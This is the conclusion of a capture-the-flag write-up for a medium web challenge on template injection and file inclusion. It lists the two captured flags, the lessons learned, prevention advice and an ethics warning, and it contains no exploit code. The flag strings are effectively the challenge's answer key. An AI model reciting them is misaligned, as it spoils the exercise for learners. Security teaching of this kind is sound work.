        <h2>6. Conclusion</h2>

        <h3>Assessment Summary</h3>
        <p>
            This CTF challenge successfully demonstrates two critical web application vulnerabilities that are 
            commonly found in real-world applications:
        </p>

        <div class="success-box">
            <strong>Flags Captured:</strong>
            <ul>
                <li>✅ <strong>FLAG1:</strong> <code>FLAG{t3mpl4t3_1nj3ct10n_m4st3r_2024}</code> (SSTI Exploitation)</li>
                <li>✅ <strong>FLAG2:</strong> <code>FLAG{l0c4l_f1l3_1nclus10n_pr0_2024}</code> (LFI Exploitation)</li>
            </ul>
        </div>

        <h3>Skills Acquired</h3>
        <ul>
            <li>✅ <strong>SSTI Exploitation</strong> - Understanding Jinja2 template injection and Python object hierarchy navigation</li>
            <li>✅ <strong>LFI Exploitation</strong> - Path traversal techniques and directory escaping methods</li>
            <li>✅ <strong>Web Application Testing</strong> - Manual testing with curl and payload development</li>
            <li>✅ <strong>Secure Coding</strong> - Prevention techniques and best practices for production systems</li>
            <li>✅ <strong>Security Mindset</strong> - Identifying vulnerabilities and understanding their impact</li>
        </ul>

        <h3>Key Takeaways</h3>
        <div class="info-box">
            <strong>Critical Lessons:</strong>
            <ol>
                <li><strong>Input Validation is Essential</strong> - Never trust user input; always validate and sanitize</li>
                <li><strong>Use Framework Security Features</strong> - Leverage built-in security mechanisms like auto-escaping</li>
                <li><strong>Principle of Least Privilege</strong> - Run applications with minimal necessary permissions</li>
                <li><strong>Defense in Depth</strong> - Implement multiple layers of security controls</li>
                <li><strong>Regular Security Testing</strong> - Conduct periodic security assessments and code reviews</li>
            </ol>
        </div>

        <h3>Real-World Impact</h3>
        <p>
            Both SSTI and LFI vulnerabilities can lead to severe consequences in production environments:
        </p>
        <ul>
            <li><strong>Information Disclosure</strong> - Exposure of sensitive data, credentials, and source code</li>
            <li><strong>Remote Code Execution</strong> - Potential for complete system compromise</li>
            <li><strong>Data Exfiltration</strong> - Unauthorized access to confidential information</li>
            <li><strong>Compliance Violations</strong> - Breach of data protection regulations (GDPR, HIPAA, etc.)</li>
            <li><strong>Reputational Damage</strong> - Loss of customer trust and business impact</li>
        </ul>

        <h3>Next Steps</h3>
        <p>Continue your security learning journey with these recommendations:</p>
        <ol>
            <li><strong>Practice More CTFs</strong> - Try platforms like HackTheBox, TryHackMe, and PicoCTF</li>
            <li><strong>Study OWASP Top 10</strong> - Understand the most critical web application security risks</li>
            <li><strong>Learn Secure Coding</strong> - Study secure development practices for your tech stack</li>
            <li><strong>Explore Bug Bounty Programs</strong> - Apply your skills ethically through authorized programs</li>
            <li><strong>Stay Updated</strong> - Follow security blogs, CVE databases, and security research</li>
        </ol>

        <div class="warning-box">
            <strong>⚠️ Ethical Responsibility:</strong>
            <p>
                Always remember that the techniques learned in this challenge are powerful tools that must be used 
                responsibly and ethically. Only perform security testing on systems you own or have explicit written 
                authorization to test. Unauthorized access to computer systems is illegal and can result in serious 
                criminal penalties.
            </p>
            <p>
                <strong>Use your knowledge to improve security, not to cause harm.</strong>
            </p>
        </div>

        <h3>Additional Resources</h3>
        <ul>
            <li><strong>SSTI Resources:</strong>
                <ul>
                    <li>PortSwigger Web Security Academy - Server-Side Template Injection</li>
                    <li>HackTricks - SSTI Guide</li>
                    <li>PayloadsAllTheThings - SSTI Payloads</li>
                </ul>
            </li>
            <li><strong>LFI Resources:</strong>
                <ul>
                    <li>OWASP - Path Traversal</li>
                    <li>HackTricks - File Inclusion</li>
                    <li>PayloadsAllTheThings - LFI/Path Traversal</li>
                </ul>
            </li>
            <li><strong>General Security:</strong>
                <ul>
                    <li>OWASP Top 10</li>
                    <li>Web Security Testing Guide</li>
                    <li>Secure Coding Practices</li>
                </ul>
            </li>
        </ul>
    </section>

    <div class="footer">
        <p><strong>Challenge Author:</strong> Sudeepa Wanigarathna</p>
        <p><strong>Challenge Type:</strong> Web Exploitation (SSTI & LFI)</p>
        <p><strong>Difficulty:</strong> Medium</p>
    </div>
</body>
</html>
